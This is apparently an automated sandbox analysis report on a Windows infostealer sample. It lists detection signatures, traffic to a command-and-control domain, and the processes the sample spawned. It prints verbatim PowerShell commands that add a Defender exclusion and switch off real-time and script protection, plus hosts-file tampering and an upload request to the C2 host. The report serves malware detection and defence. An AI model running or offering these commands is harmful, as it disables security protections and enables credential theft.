Windows Analysis Report
DmI602ZFyp.exe

Overview

General Information

Sample name: DmI602ZFyp.exe
renamed because original name is a hash value
Original sample name: 3b5fd2faa64b735197087df255850740bf87a2f7ee1f7ede61ff7bec4f04d89f.exe
Analysis ID: 1563093
MD5: b719f5289acdec0fe628bf670e5b0996
SHA1: 8ea3332a38ec88aae2a77b463cc4eac8631e3912
SHA256: 3b5fd2faa64b735197087df255850740bf87a2f7ee1f7ede61ff7bec4f04d89f
Tags: 51-210-106-44, exe, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner
Verdict scale: clean, suspicious, malicious

AV Detection

Source: DmI602ZFyp.exe ReversingLabs: Detection: 26%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: DmI602ZFyp.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ws?id=ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi0zMDk5LTlDMEUtQzE5Qi0yQTIzRUExRkM0MjA= HTTP/1.1
  Host: w.tundara.dev
  User-Agent: Go-http-client/1.1
  Connection: Upgrade
  Sec-WebSocket-Key: +ImwcL8yNRirG18BIv31hQ==
  Sec-WebSocket-Version: 13
  Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /json/ HTTP/1.1
  Host: ip-api.com
  User-Agent: Go-http-client/1.1
  Accept-Encoding: gzip
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: b.tundara.dev
Source: global traffic DNS traffic detected: DNS query: w.tundara.dev
Source: unknown HTTP traffic detected: POST /tapped/66d82f8e-64e7-4a18-aa38-b985b61ff00d/ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi0zMDk5LTlDMEUtQzE5Qi0yQTIzRUExRkM0MjA= HTTP/1.1
  Host: b.tundara.dev
  User-Agent: Go-http-client/1.1
  Content-Length: 574
  Content-Type: multipart/form-data; boundary=7d41525b79902bc65c72991aefe4d247b0f90ac16eb4354ff334c78dc83e
  Accept-Encoding: gzip
Source: powershell.exe, 00000008.00000002.2428058504.00000197D68E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: DmI602ZFyp.exe String found in binary or memory: http://dejavu.sourceforge.net
Source: DmI602ZFyp.exe String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: DmI602ZFyp.exe String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: DmI602ZFyp.exe String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: DmI602ZFyp.exe String found in binary or memory: http://emojione.com/licensingColor
Source: DmI602ZFyp.exe String found in binary or memory: http://emojione.comEmojiOne
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://ip-api.com/json/DestroyEnvironmentBlock
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://s.symcd.com0_
Source: powershell.exe, 00000008.00000002.2427908012.00000197D67D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.mic;i
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://sw.symcd.com0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001845000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C00173E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: DmI602ZFyp.exe, 00000000.00000002.2583628469.000000C000456000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://b.tundara.dev/tapped/66d82f8e-64e7-4a18-aa38-b985b61ff00d/ZWM6ZjQ6YmI6MmQ6MjQ6OTY0RDgwMjc0Mi
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00180E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: DmI602ZFyp.exe, 00000000.00000000.2164097773.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp, DmI602ZFyp.exe, 00000000.00000002.2604014814.00007FF7F4EA8000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: https://d.symcb.com/rpa0)
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://discord.com/api/v8/guilds/expected
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://discord.com/api/v9/users/
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://discord.gg/tls:
Source: powershell.exe, 00000008.00000002.2404619844.00000197BE697000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001848000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001848000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 00000008.00000002.2422769227.00000197CE4E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/pr
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001002000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001744000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00180C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: DmI602ZFyp.exe, 00000000.00000002.2583628469.000000C000478000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D20000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001053000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587385434.000000C000D33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C00173E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001002000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C00182C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2591728232.000000C001820000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: DmI602ZFyp.exe, 00000000.00000002.2588970628.000000C001774000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: DmI602ZFyp.exe, 00000000.00000002.2587825160.000000C001002000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F5820000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: DirectInput8Create memstr_390e64ad-c
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dll
Source: DmI602ZFyp.exe, 00000000.00000000.2165777449.00007FF7F5E87000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: GetRawInputData memstr_5fbad43c-3

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\DmI602ZFyp.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD33EE5FF2 8_2_00007FFD33EE5FF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD33EE5B7F 8_2_00007FFD33EE5B7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD33EE8AF2 8_2_00007FFD33EE8AF2
Source: DmI602ZFyp.exe Static PE information: Number of sections : 11 > 10
Source: classification engine Classification label: mal84.adwa.spyw.evad.winEXE@25/15@3/2
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File created: C:\Users\user\AppData\Roaming\fyne
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:828:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File created: C:\Users\user\AppData\Local\Temp\logs-temp
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File opened: C:\Windows\system32\610942b6ec77123880c015455655e1338f99ed881a1f72503dff235efdf19470AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: DmI602ZFyp.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: DmI602ZFyp.exe, 00000000.00000002.2601784413.000001857E833000.00000004.00001000.00020000.00000000.sdmp, DmI602ZFyp.exe, 00000000.00000002.2602350132.000001857F2C5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: DmI602ZFyp.exe String found in binary or memory: C:/Users/Tundara/go/pkg/mod/fyne.io/fyne/v2@v2.5.2/internal/metadata/load.go
Source: DmI602ZFyp.exe String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File read: C:\Users\user\Desktop\DmI602ZFyp.exe
Source: unknown Process created: C:\Users\user\Desktop\DmI602ZFyp.exe "C:\Users\user\Desktop\DmI602ZFyp.exe"
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DmI602ZFyp.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DmI602ZFyp.exe
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
